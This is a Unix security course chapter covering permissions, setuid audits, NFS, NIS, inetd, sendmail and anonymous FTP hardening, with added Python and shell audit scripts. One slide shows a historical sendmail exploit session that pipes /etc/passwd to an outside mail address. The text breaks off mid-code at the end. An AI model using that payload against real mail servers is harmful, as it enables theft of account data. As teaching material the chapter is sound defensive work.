Chapter 12

ubuntu chap12

Uploaded by

Hữu Vinh

File System Security

THE UNIX FILE SYSTEM

In the UNIX operating system there is no concept of separate
disk drives. After the boot process, all directories and files
are "mounted" and form one unified file system, starting
from the root '/'.
SUN OS File System

Sun Microsystems Inc. SunOS 5.6 Generic August 1997


$ df -k
Filesystem kbytes used avail capacity Mounted on
/dev/dsk/c0t0d0s0 192799 131990 41530 77% /
/dev/dsk/c0t0d0s6 962983 477544 427661 53% /usr
/proc 0 0 0 0% /proc
fd 0 0 0 0% /dev/fd
/dev/dsk/c0t0d0s3 289207 115445 144842 45% /var
/dev/dsk/c0t0d0s5 465775 28807 390391 7% /opt
/dev/dsk/c0t0d0s7 1290127 233611 1004911 19% /other
/dev/dsk/c0t0d0s1 311983 203961 76824 73% /usr/openwin
swap 418136 120 418016 1% /tmp
/dev/dsk/c0t1d0s2 4124422 2359571 1723607 58% /squid
$
Linux File System

[citd@server citd]$ df -k
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/sda1 447044 45006 378948 11% /
/dev/sda6 496627 119068 351909 25% /export
/dev/sda5 496627 405042 65935 86% /usr
/dev/sda7 492657 329963 137249 71% /var
[citd@server citd]$
/-------+
        !-------/bin
        !-------/sbin
        !-------/usr-------/usr/bin
        !           !------/usr/sbin
        !           !------/usr/local
        !           !------/usr/doc
        !
        !-------/etc
        !-------/lib
        !-------/var-------/var/adm
                    !------/var/log
                    !------/var/spool
CORRESPONDENCE BETWEEN DISK PARTITIONS
AND THE FILE SYSTEM STRUCTURE

[Figure: the disk partitions /, /usr, /squid and a CD are mapped onto the mount points /, /usr, /usr/home, /mnt/cdrom and /squid of the single directory tree]
INTRODUCTION TO THE IMPORTANT
UNIX DIRECTORIES

/ (ROOT DIRECTORY)

/bin
/sbin
/usr/bin
/usr/sbin
/var
/var/log
/var/adm
/home
/export/home (SUNOS)
Unix file and directory permissions and ownership
(directory and file permission and ownership)
Output of the ls -l command:

-rw-r--r-- 1 fido users 163 Dec 7 14:31 myfile

When a file or directory is created, it takes the owner and group of the user
who created it. The permissions given to user, group and other depend on
the value of umask.
Umask and file access permissions

Example:
[tnminh@pasteur tnminh]$ umask
002
[tnminh@pasteur tnminh]$ echo "tao mot file" > tmp
[tnminh@pasteur tnminh]$ ls -l
total 5472
-rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp
[tnminh@pasteur /etc]$ umask 022
[tnminh@pasteur tnminh]$ echo "tao mot file khac" > tmp1
[tnminh@pasteur tnminh]$ ls -l
-rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp
-rw-r--r-- 1 tnminh tnminh 18 Oct 3 21:59 tmp1
Binary (octal) form of file and directory
access permissions
File access permissions are split into three numeric groups: for the owner (user),
the group, and everyone else (others):
read permission 4
write permission 2
execute permission 1
Hence:
• 0 or ---: No permissions at all
• 4 or r--: read-only
• 2 or -w-: write-only (rare)
• 1 or --x: execute
• 6 or rw-: read and write
• 5 or r-x: read and execute
• 3 or -wx: write and execute (rare)
• 7 or rwx: read, write, and execute
Changing file and directory
attributes
Relative (symbolic) method:
• chmod g+w myfile → adds write permission for the group of myfile
• chmod o-x myfile → removes execute permission for others on myfile

Absolute (numeric) method:

• chmod 644 myfile => myfile will have the permissions rw-r--r--
For administrators the absolute method is recommended, because it is safer.
For directories the operation is exactly the same.
chown changes the owner of a file;
chgrp changes the group of a file.
setuid and setgid bits
Set-user-id: set-user-id means that when the program runs, it has the
privileges of the file's owner, no matter who invoked the program.
Example:
• $ ls -l /usr/sbin/sendmail
• rwsr-xr-x root root sendmail
Similarly, set-group-id gives the program the privileges of the group of the
program file.
A fourth (leading) octal digit encodes these bits: 4 = setuid, 2 = setgid.
If /bin/sh had the setuid bit set, everybody would be root, because the owner of
/bin/sh is root and every user runs /bin/sh at login.
setgid on a directory = files created in this directory get the same group as the
group of the directory.
setuid on a directory = no effect.
Sticky bit = a user may only delete the files they own. Example: /tmp.
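To make the octal arithmetic of the three sections above concrete, here is an added Python example (my own code, not from the original slides): it converts between the ls -l mode strings shown earlier and four-digit octal modes, including the s and t columns for setuid, setgid and the sticky bit, applies a umask to the default creation mode, and flags the setuid-root, setgid and world-writable cases the slides warn about. Function names and the sample mode strings are my own choices.

```python
# Added example: permission-string <-> octal conversion, umask arithmetic
# and a small risk check. Not from the original slides; names are mine.

PERM_BITS = {"r": 4, "w": 2, "x": 1}


def triplet_to_octal(triplet):
    """'rw-' -> 6, 'r-x' -> 5. A lowercase s or t in the x column counts as x;
    uppercase S or T means the special bit is set but x is not."""
    value = 0
    for ch, bit in zip(triplet, "rwx"):
        if ch == bit or (bit == "x" and ch in "st"):
            value |= PERM_BITS[bit]
    return value


def mode_string_to_octal(mode_str):
    """Parse the 10-character ls -l mode field into a four-digit octal mode.

    '-rw-r--r--' -> 0o644
    '-rwsr-xr-x' -> 0o4755  (setuid: s in the owner x column)
    'dr-xr-sr-x' -> 0o2555  (setgid: s in the group x column)
    'drwxrwxrwt' -> 0o1777  (sticky: t in the others x column)
    """
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character mode string such as -rw-r--r--")
    user, group, other = mode_str[1:4], mode_str[4:7], mode_str[7:10]
    special = 0
    if user[2] in "sS":
        special |= 4
    if group[2] in "sS":
        special |= 2
    if other[2] in "tT":
        special |= 1
    return (special << 9) | (triplet_to_octal(user) << 6) \
        | (triplet_to_octal(group) << 3) | triplet_to_octal(other)


def octal_to_mode_string(mode, is_dir=False):
    """Inverse of mode_string_to_octal: 0o4755 -> '-rwsr-xr-x'."""
    out = ["d" if is_dir else "-"]
    for shift, special_bit, special_char in ((6, 0o4000, "s"),
                                             (3, 0o2000, "s"),
                                             (0, 0o1000, "t")):
        bits = (mode >> shift) & 7
        out.append("r" if bits & 4 else "-")
        out.append("w" if bits & 2 else "-")
        has_x = bool(bits & 1)
        if mode & special_bit:
            out.append(special_char if has_x else special_char.upper())
        else:
            out.append("x" if has_x else "-")
    return "".join(out)


def apply_umask(umask, is_dir=False):
    """Mode a newly created file (0666) or directory (0777) receives under umask."""
    base = 0o777 if is_dir else 0o666
    return base & ~umask & 0o777


def risk_flags(mode_str, owner):
    """Flags matching the checks in the slides: setuid root, setgid and
    world-writable (a sticky world-writable directory such as /tmp is accepted)."""
    mode = mode_string_to_octal(mode_str)
    flags = []
    if mode & 0o4000 and owner == "root":
        flags.append("setuid root")
    if mode & 0o2000:
        flags.append("setgid")
    sticky_dir = mode_str[0] == "d" and mode & 0o1000
    if mode & 0o002 and not sticky_dir:
        flags.append("world-writable")
    return flags
```

With umask 002 a new file gets 0664 (rw-rw-r--) and with umask 022 it gets 0644 (rw-r--r--), which is exactly the difference between tmp and tmp1 in the session above.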
Securing the system by checking the setuid
and setgid bits
• Find files with the setuid bit set:
• find / -perm -4000 -exec ls -l {} \;
• Similarly for setgid (-perm -2000):
• Find files without an owner:
• find / -nouser -exec ls -l {} \;
• Find world-writable files:
• find / -perm -2 -print
• Find files with no owner:
• find / -nouser -print
-r-s--x--x 1 root root 10704 Apr 15 1999 /usr/bin/passwd
-rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 root mail 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 root root 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 root root 10516 Apr 16 1999 /usr/bin/rlogin

• Note: never give shell scripts the setuid or setgid bit. If setuid or setgid
is really needed, write the program in C or an equivalent compiled
language.
Some "dangerous" files. Trusted hosts
• /etc/hosts.equiv: a user coming from a machine whose IP is listed in this
file, with the same account name, can use rlogin and rsh without entering
a password on this machine. Fortunately, root is an exception.
• .rhosts: like /etc/hosts.equiv, but checked per host-user pair. In particular,
a user can create .rhosts without going through the admin. Therefore the
creation of .rhosts in personal (home) directories should be forbidden altogether.
Checksum and checklist
• The sum command lets us check whether the content of a file has been
changed. This helps us detect viruses, since a virus generally has to change
the content of a file.
• Run sum in the directories whose content should never change in principle,
/sbin and /bin. Record the result in a file and use it later to find the
files whose checksum has changed.
• A checklist (produced with the ls command) finds changes to the system
files. As with the checksum, we should create a checklist file right from
the start. This way we will know about newly created, illegitimate files.
Access Control List (ACL)
• This is a newer Unix standard that allows access to the file system to be
granted in finer detail than the traditional Unix permission system. For
example, it lets the whole group ggg have read permission while user uuu
of that group ggg has read and write permission.
• The two basic ACL commands are getfacl and setfacl.
• To add an ACL to a file, we use the command
• setfacl -m acl_entry_list filename
• To know whether a file uses an ACL, ls -l shows
• -rw-r-----+ ..etc. The + sign indicates that the file uses an ACL.
• ACLs can be used on SUN OS 5.6.
Network File System (NFS)

NFS, the Network File System, has three important characteristics:

• It makes sharing of files over a network possible.
• It mostly works well enough.
• It opens a can of security risks that are well understood by
crackers, and easily exploited to get access (read, write and delete)
to all your files.
In principle the NFS server trusts the NFS client and vice versa. Therefore,
if an NFS server or client is compromised, this easily leads to the
compromise of the whole NFS network.
NFS model
Server: eris, /etc/exports
/mn/eris/local apollon(rw)

Client: apollon
mount -o rsize=1024,wsize=1024 eris:/mn/eris/local /mnt
cd /mnt
ls -l
Or in /etc/fstab
# device mountpoint fs-type options dump fsckorder
eris:/mn/eris/local /mnt nfs rsize=1024,wsize=1024 0 0
NFS Client Security

nosuid option: the server's root user cannot make a suid-root
program on the file system, log in to the client as a normal user and
then use the suid-root program to become root on the client.
Remote Procedure Call (RPC)-based
services
- For the TCP and UDP protocols the port number is 2 bytes (65536 max.)
- Each RPC-based service has a unique 4-byte RPC service number (4294 M ports)
- The portmapper listens on port 111 (TCP and UDP)
- When an RPC-based server starts, it takes a TCP or UDP port and then tells
the portmapper the mapping between its unique RPC number and the TCP/UDP
port it has just obtained.
- When an RPC client wants to connect to an RPC-based server, it "asks"
the portmapper and learns the TCP port the RPC-based server is listening on.
- Client and server then "forget" the portmapper and talk to each other directly.
- An intruder can therefore bypass the portmapper.
NFS Server Security
• root_squash option: now, if a user with UID 0 on the client attempts to access (read,
write, delete) the file system, the server substitutes the UID of the
server's `nobody' account. This means that the root user on the
client can't access or change files that only root on the server can
access or change.

But root on the client can su to bin or adm and can then get at the
files with owner=bin on the server. Therefore binaries and other important
files should be owned by root.

• The portmapper and nfsd can have security problems that allow unauthorized access
to the server's file system. To close this hole, put
portmap: ALL in the file /etc/hosts.deny and
portmap: 129.240.223.0/255.255.255.0 in /etc/hosts.allow, to allow the network
129.240.233.0 to use the portmapper.
• If /etc/exports lists only a file system without a host, every host has the right to mount
it from the server.
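The hosts.allow/hosts.deny pair above is evaluated by tcp_wrappers: hosts.allow is consulted first, then hosts.deny, and a client that matches neither file is let in. The following added Python example (my own code, not from the slides or from tcp_wrappers itself) models that decision for the portmap rule shown above. It supports only the client forms used on this page (ALL, a net/netmask pair, a trailing-dot prefix and an exact address), not EXCEPT clauses, host names or shell commands; the file contents are constructed.

```python
# Added example: a simplified model of how tcp_wrappers consults
# /etc/hosts.allow and /etc/hosts.deny for the portmapper rule in the slides.
# Not from the original slides; it supports only the forms used there.
import ipaddress


def parse_wrapper_file(text):
    """Parse 'daemon_list : client_list' lines into [(daemons, clients)]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        daemons, clients = line.split(":", 1)
        rules.append(([d.strip() for d in daemons.split(",")],
                      [c.strip() for c in clients.split(",")]))
    return rules


def client_matches(pattern, client_ip):
    if pattern == "ALL":
        return True
    if "/" in pattern:  # 129.240.223.0/255.255.255.0 style network
        net, mask = pattern.split("/", 1)
        return ipaddress.ip_address(client_ip) in ipaddress.ip_network(
            "%s/%s" % (net, mask), strict=False)
    if pattern.endswith("."):  # '129.240.' matches every address in that prefix
        return client_ip.startswith(pattern)
    return client_ip == pattern


def _file_matches(rules, daemon, client_ip):
    for daemons, clients in rules:
        if daemon in daemons or "ALL" in daemons:
            if any(client_matches(c, client_ip) for c in clients):
                return True
    return False


def decide(daemon, client_ip, allow_text, deny_text):
    """hosts.allow is consulted first, then hosts.deny; no match means access."""
    if _file_matches(parse_wrapper_file(allow_text), daemon, client_ip):
        return "allow"
    if _file_matches(parse_wrapper_file(deny_text), daemon, client_ip):
        return "deny"
    return "allow"


# Constructed files reproducing the rule from the slides.
HOSTS_ALLOW = "portmap: 129.240.223.0/255.255.255.0\n"
HOSTS_DENY = "portmap: ALL\n"
```

The last assertion-worthy case is the one the slides imply: with an empty hosts.deny, the hosts.allow line alone restricts nothing, because the default when neither file matches is to grant access; the `portmap: ALL` deny line is what actually closes the port to everyone else.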
Network Information Service (NIS, NIS+)
SUN 1990
• NIS is a service that provides information, that has to be known
throughout the network, to all machines on the network. Information
likely to be distributed by NIS is:
· login names/passwords/home directories (/etc/passwd)
· group information (/etc/group)
If, for example, your password entry is recorded in the NIS passwd
database, you will be able to login on all machines on the network
which have the NIS client programs running.
• NIS+ is designed by Sun Microsystems Inc. as a replacement for NIS
with better security and better handling of large installations.
NIS security problems

• A workstation participating in NIS needs an /etc/passwd file
whose last line is as follows:
• +::0:0:::
• or +:
If we use the first form and forget the + sign, we get a super-user
with no login name and no password ;-(. So the second
form should be used.
• If /etc/hosts.equiv contains only +, then every user of every
host who has an account name matching one on this machine can log in
without a password. Note that some Unix versions, including SUN's, install
hosts.equiv with just such a single line ;-(
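The "forgotten +" mistake above is easy to catch mechanically. Here is an added Python example (my own code, not from the slides) that audits passwd-format lines for the NIS marker with uid 0, for uid-0 entries other than root (including the nameless one left behind when the + is dropped) and for empty password fields. The sample file contents are constructed.

```python
# Added example (not from the original slides): audit /etc/passwd lines for the
# NIS-related mistakes described above. Sample file contents are constructed.


def audit_passwd(text):
    """Return a list of (line_number, problem) for suspicious passwd entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if not line:
            continue
        fields = line.split(":")
        name = fields[0]
        passwd = fields[1] if len(fields) > 1 else ""
        uid = fields[2] if len(fields) > 2 else ""
        # NIS marker lines: '+:' is the safe form, '+::0:0:::' carries uid 0
        if name.startswith(("+", "-")):
            if uid == "0":
                findings.append((lineno, "NIS marker with uid 0; prefer the '+:' form"))
            continue
        if len(fields) != 7:
            findings.append((lineno, "malformed entry (%d fields)" % len(fields)))
            continue
        if uid == "0" and name != "root":
            findings.append((lineno, "uid 0 account other than root: %r" % name))
        if passwd == "":
            findings.append((lineno, "empty password field for %r" % name))
    return findings


# Constructed sample: a locked ftp account, a rogue uid-0 account and the
# risky NIS marker form.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
ftp:*:14:50:FTP User:/home/ftp:
toor::0:0:::
+::0:0:::
"""

# The same file after the + was forgotten on the NIS line: a nameless,
# password-less super-user.
SAMPLE_PASSWD_FORGOTTEN_PLUS = SAMPLE_PASSWD.replace("+::0:0:::", "::0:0:::")
```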
#!/bin/sh
#
# fscheck - check file system for insecurities
#
# This should be run as root
#
PATH=/usr/bin:/bin
export PATH

CHECKDIRS="/bin /etc /usr/bin /usr/etc /usr/lib /usr/ucb"

# ls.master is the file to create by the command 'ls -alsgR $CHECKDIRS > ls.master'
MASTER_LS=ls.master
# sum.master is the file to create by the command 'find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > sum.master'
MASTER_SUM=sum.master
#
echo "Set-User-Id files found:"
find / -type f -a -perm -4000 -exec ls -aslg {} \;
echo ""
#
echo "Set-Group-Id files found:"
find / -type f -a -perm -2000 -exec ls -aslg {} \;
echo ""
#
# device nodes outside /dev are suspicious
echo "Device files not located in /dev :"
find / \( -type b -o -type c \) -print | grep -v '^/dev'
echo ""
#
echo "World writable files and directories : "
find / -perm -2 -exec ls -aslgd {} \;
echo ""
#
echo "Files owned by nonexistent user or group :"
find / \( -nouser -o -nogroup \) -exec ls -aslgd {} \;
echo ""
#
# current listing and checksums of the trusted directories
ls -alsgR $CHECKDIRS > /tmp/lschk.$$
#
find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > /tmp/sumchk.$$
#
echo "Files in $CHECKDIRS whose attributes have changed : "
echo "< = master check list, > = current listing"
diff $MASTER_LS /tmp/lschk.$$
echo ""
#
echo "Files in $CHECKDIRS whose checksums have changed:"
echo "< = master check list, > = current listing"
diff $MASTER_SUM /tmp/sumchk.$$
rm -f /tmp/lschk.$$ /tmp/sumchk.$$
exit 0
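The checksum/checklist idea from the earlier section and the fscheck script above boil down to two jobs: record a baseline of attributes and content for trusted directories, then diff the current state against it, plus a scan for setuid/setgid/world-writable files. The following added Python example (my own code, not the script from the slides) does the same with SHA-256 in place of the weak `sum` checksum and a JSON master file. The `demo()` function builds a throwaway directory, takes a baseline, simulates tampering and re-scans; the paths and file contents are constructed.

```python
# Added example (not from the original slides): a Python version of the two
# jobs fscheck does, a checklist/checksum baseline compared against the
# current state, and a scan for setuid/setgid/world-writable files.
import hashlib
import json
import os
import stat
import tempfile

TRACKED = ("mode", "uid", "gid", "size", "sha256")


def scan_tree(root):
    """Map each regular file below root to its attributes and content hash."""
    records = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and device nodes are not hashed
            digest = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    digest.update(chunk)
            records[os.path.relpath(path, root)] = {
                "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid,
                "gid": st.st_gid, "size": st.st_size, "sha256": digest.hexdigest()}
    return records


def save_master(records, path):
    with open(path, "w") as f:
        json.dump(records, f, indent=1, sort_keys=True)


def load_master(path):
    with open(path) as f:
        return json.load(f)


def compare(master, current):
    """Equivalent of the two diff runs: new files, vanished files, changed files."""
    added = sorted(set(current) - set(master))
    removed = sorted(set(master) - set(current))
    changed = {}
    for path in sorted(set(master) & set(current)):
        diffs = [k for k in TRACKED if master[path][k] != current[path][k]]
        if diffs:
            changed[path] = diffs
    return {"added": added, "removed": removed, "changed": changed}


def suspicious(records):
    """Equivalent of the find -perm checks at the top of fscheck."""
    out = {}
    for path, rec in sorted(records.items()):
        flags = []
        if rec["mode"] & stat.S_ISUID:
            flags.append("setuid")
        if rec["mode"] & stat.S_ISGID:
            flags.append("setgid")
        if rec["mode"] & stat.S_IWOTH:
            flags.append("world-writable")
        if flags:
            out[path] = flags
    return out


def demo():
    """Build a throwaway 'bin' directory, take a baseline, tamper, re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = os.path.join(tmp, "bin")
        os.mkdir(bindir)
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        with open(os.path.join(bindir, "passwd"), "wb") as f:
            f.write(b"placeholder for a setuid binary\n")
        os.chmod(os.path.join(bindir, "passwd"), 0o4511)   # r-s--x--x as in the slides
        master_path = os.path.join(tmp, "master.json")     # kept outside bindir
        save_master(scan_tree(bindir), master_path)
        # Simulated tampering: trojaned ls, made world-writable, plus a new file.
        with open(os.path.join(bindir, "ls"), "ab") as f:
            f.write(b"echo trojan\n")
        os.chmod(os.path.join(bindir, "ls"), 0o777)
        with open(os.path.join(bindir, "newfile"), "wb") as f:
            f.write(b"x")
        current = scan_tree(bindir)
        return compare(load_master(master_path), current), suspicious(current)


if __name__ == "__main__":
    report, flagged = demo()
    print(json.dumps(report, indent=1))
    print(flagged)
```

As with the script, the master file is only as trustworthy as its storage: keep it off the machine being checked, or at least on read-only media, since an intruder who can edit the baseline can hide any change.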
Lesson 3: Network Service Security

• So far we have discussed at length the protection against intrusions
through the weak points or installation errors of the UNIX
operating system itself.
• We now turn to intrusions through the services that a Unix machine
opens to the network.
Inetd and /etc/inetd.conf

• inetd is used to start the daemons that provide network services.
inetd waits for network connections on a number of ports. When a connection
request arrives, inetd calls the corresponding server program to set up the connection.
• inetd reads the file /etc/inetd.conf when it is loaded into memory.
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
# Echo, discard, daytime, and chargen are used primarily for testing.
# To re-read this file after changes, just do a 'killall -HUP inetd'
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
#
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Inetd and security

• /etc/inetd.conf can be used to solve a number of security problems, as
follows:

- If we do not want to use a service, we simply put a # in front of its
configuration line. On machines that require high security, the general rule
is to disable every service that we do not need or do not understand. If the
machine then misbehaves, we remove the # comments one by one, and in this way
we also learn what each service does.
- Services to consider removing are finger, tftp and talk.
- For a service that has security problems but cannot be cut off,
we can reduce the privileges of the service by changing the user
field.
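The review described in the three points above can be scripted. The following added Python example (my own code, not from the slides) parses inetd.conf lines in the seven-field format shown earlier, skips commented-out entries, and reports the services the slides name as candidates for removal as well as every enabled service whose user field is still root. The sample configuration is constructed from the two lines shown above plus two extra entries.

```python
# Added example (not from the original slides): parse /etc/inetd.conf and report
# the two things the slides tell us to look at, services worth disabling and
# services still running as root.

SERVICES_TO_DISABLE = {"finger", "tftp", "talk"}   # the three named in the slides


def parse_inetd_conf(text):
    """Return the enabled (uncommented) entries as dicts."""
    services = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 6:
            continue  # not a complete entry
        name, sock_type, proto, flags, user, server = fields[:6]
        services.append({"name": name, "socket": sock_type, "proto": proto,
                         "flags": flags, "user": user, "server": server,
                         "args": fields[6] if len(fields) > 6 else ""})
    return services


def audit_inetd(text):
    """Findings in file order: one per enabled risky service, one per root service."""
    findings = []
    for svc in parse_inetd_conf(text):
        if svc["name"] in SERVICES_TO_DISABLE:
            findings.append("%s: enabled; consider commenting it out" % svc["name"])
        if svc["user"] == "root" and svc["server"] != "internal":
            findings.append("%s: runs as root; review the user field" % svc["name"])
    return findings


# Constructed sample: the two lines from the slides plus finger and tftp.
SAMPLE_INETD_CONF = """\
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#time   stream  tcp     nowait  root    internal
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
tftp    dgram   udp     wait    root    /usr/sbin/tcpd  in.tftpd
"""
```

Note that finger running as nobody, as the summary at the end of this lesson recommends, is reported only as a service to consider disabling, not as a root service.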
Email, SMTP and Sendmail

• Email is the most basic and widespread Internet service. The
protocol used for email connections is SMTP (Simple Mail Transfer
Protocol).
• Sendmail is the most widespread SMTP server. Although
sendmail has had many security "scandals" over its development history,
so far no program has been able to replace sendmail, especially
in terms of features. The cause of sendmail's bugs is that sendmail
is quite long and complex (about 30,000 lines of code), and when
running in memory sendmail needs root privileges to carry out
its task. However, because so many people use sendmail, its bugs are
found very quickly and widely announced, which allows quick fixes.

Two intrusion paths through a mail server
Through the commands the mail server accepts from outside: command channel attacks.
The Morris worm used this path by exploiting the debug bug of sendmail.

Through the content of the mail: data-driven attacks. Mail server programs all
use a local mail program to send/receive the machine's internal mail and to interface
with the user. On Unix this is usually /bin/mail. If /bin/mail has a bug, an intruder
can make /bin/mail execute commands written in the body of the mail.
Electronic mail today is usually multimedia, so external programs are needed to
"read" the mail. Which external program "reads" the mail, and how, is beyond the
control of the classic mail programs. For example, one Christmas IBM's network
was paralysed because millions of mails carrying a Christmas tune were sent automatically.
Be careful with mails whose content advises you to change your password to a new
password on behalf of the admin, or to report your Visa card's personal code to the bank.
Checking the running sendmail

• Points to check:

• Use a recent version. Check the version of sendmail, because some old versions
have problems related to system security.
$ telnet pasteur.bvt.hcm 25
220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 +0700
• The wiz and debug functions must not be available:
220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 +0700
wiz
500 Command unrecognized: "wiz"
debug
500 Command unrecognized: "debug"
If debug is enabled, your sendmail version must be replaced.
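The two manual checks above (banner version, and 500 replies to wiz and debug) can be evaluated from a recorded session. Here is an added Python example (my own code, not from the slides) that extracts the sendmail version from the 220 greeting, compares it against a minimum, and verifies that wiz and debug were rejected. The minimum version is a parameter; 8.9.3, the version in the session above, is only a default I chose. The transcripts are constructed from the output shown on this page.

```python
# Added example (not from the original slides): evaluate an SMTP session
# transcript the way the check above is done by hand.
import re

VERSION_RE = re.compile(r"Sendmail (\d+(?:\.\d+)*)")


def parse_sendmail_version(banner):
    """'220 host ESMTP Sendmail 8.9.3/8.9.3; ...' -> (8, 9, 3); None if absent."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def check_smtp_transcript(transcript, minimum=(8, 9, 3)):
    """transcript: list of (command, reply); command is None for the greeting.

    Returns a list of findings; an empty list means the session passed."""
    findings = []
    for command, reply in transcript:
        code = reply.split(None, 1)[0] if reply else ""
        if command is None and code == "220":
            version = parse_sendmail_version(reply)
            if version is None:
                findings.append("banner does not announce a sendmail version")
            elif version < minimum:  # tuple comparison: (5, 55) < (8, 9, 3)
                findings.append("sendmail %s is older than %s" % (
                    ".".join(map(str, version)), ".".join(map(str, minimum))))
        elif command is not None and command.strip().lower() in ("wiz", "debug"):
            if code != "500":
                findings.append("%s not rejected (reply %s)" % (
                    command.strip().lower(), code))
    return findings


# Session from the slides: current version, both commands rejected.
GOOD_SESSION = [
    (None, "220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 +0700"),
    ("wiz", '500 Command unrecognized: "wiz"'),
    ("debug", '500 Command unrecognized: "debug"'),
]

# Constructed: an old server (banner from the next slide) that still answers debug.
BAD_SESSION = [
    (None, "220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04"),
    ("debug", "250 Debug set"),
]
```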
Example of a sendmail bug

telnet victim.com 25
Trying 128.128.128.1 ...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
Mail from: "|/bin/mail [email protected] < /etc/passwd"
250 "|/bin/mail [email protected] < /etc/passwd" ... sender OK
Rcpt to: nosuchuser
550 nosuchuser ... User unknow
Data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
Quit
Connection closed by foreign host.
$
FTP

• The File Transfer Protocol is implemented by ftp and ftpd. Use an ftpd from after
1989.
• To secure ftp, anonymous FTP must be configured properly:
• create the ftp account with * in the password field, so that nobody can log in with it
• create a home directory for the ftp account (for example /home/ftp)
• this directory is owned by ftp and writable by nobody
• chown ftp ~ftp
• chmod 555 ~ftp
• create the directories bin, etc, usr as required by the Unix in use; all these
directories have permissions 555
• copy the passwd and group files into ~ftp/etc. Delete all accounts except
ftp. These two files have permissions 444
ftp (2)
• Copy ls into ~ftp/bin with permissions 111
• Create the directory ~ftp/pub with permissions 577, owner ftp.
Anonymous connections will use the ftp account.
• Nowadays, if we install wu-ftp, the permissions
of these directories are set automatically.
• Example ftp configuration of RedHat 6.0
[tnminh@pateur /home]$ ls -l
total 9
drwxr-xr-x 6 root root 1024 Mar 21 1999 ftp
drwxr-xr-x 2 root nobody 1024 Apr 16 1999 samba
ftp (3)
[tnminh@pateur /home]$ ls -l ftp
total 4
d--x--x--x 2 root root 1024 Nov 5 02:15 bin
d--x--x--x 2 root root 1024 Nov 5 02:15 etc
drwxr-xr-x 2 root root 1024 Nov 5 02:15 lib
dr-xr-sr-x 2 root ftp 1024 Mar 21 1999 pub
[tnminh@pateur /home]$
[root@pateur etc]# more ~ftp/etc/passwd
root:*:0:0:::
bin:*:1:1:::
operator:*:11:0:::
ftp:*:14:50:::
nobody:*:99:99:::
[root@pateur etc]#
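The anonymous-ftp setup steps above amount to a small policy: nothing under ~ftp is writable by group or other except the upload directory, passwd and group in ~ftp/etc are mode 444, and every account left in ~ftp/etc/passwd is locked with *. The following added Python example (my own code, not from the slides or from wu-ftpd) checks a directory tree against that policy. Its `demo()` builds a throwaway ~ftp with one deliberate mistake per rule; the layout, file contents and the name of the `incoming` directory are constructed.

```python
# Added example (not from the original slides): check an anonymous-ftp home
# directory against the rules listed above.
import os
import shutil
import stat
import tempfile


def audit_ftp_home(ftp_home, upload_dirs=("pub",)):
    """Return findings in walk order; an empty list means the tree conforms."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(ftp_home):
        dirnames.sort()  # deterministic traversal
        for name in sorted(dirnames + filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, ftp_home)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & (stat.S_IWGRP | stat.S_IWOTH) and rel not in upload_dirs:
                findings.append("%s: writable by group/other (%04o)" % (rel, mode))
            if rel in ("etc/passwd", "etc/group") and mode != 0o444:
                findings.append("%s: mode %04o, expected 0444" % (rel, mode))
    passwd_path = os.path.join(ftp_home, "etc", "passwd")
    if os.path.isfile(passwd_path):
        with open(passwd_path) as f:
            for line in f:
                fields = line.rstrip("\n").split(":")
                if len(fields) > 1 and fields[1] != "*":
                    findings.append("etc/passwd: account %s is not locked with *"
                                    % fields[0])
    return findings


def demo():
    """Build ~ftp with one deliberate mistake per rule and return the findings."""
    tmp = tempfile.mkdtemp()
    try:
        for d in ("bin", "etc", "lib", "pub", "incoming"):
            os.mkdir(os.path.join(tmp, d))
        with open(os.path.join(tmp, "etc", "passwd"), "w") as f:
            f.write("ftp:*:14:50:::\nguest:x:500:500:::\n")   # guest: mistake
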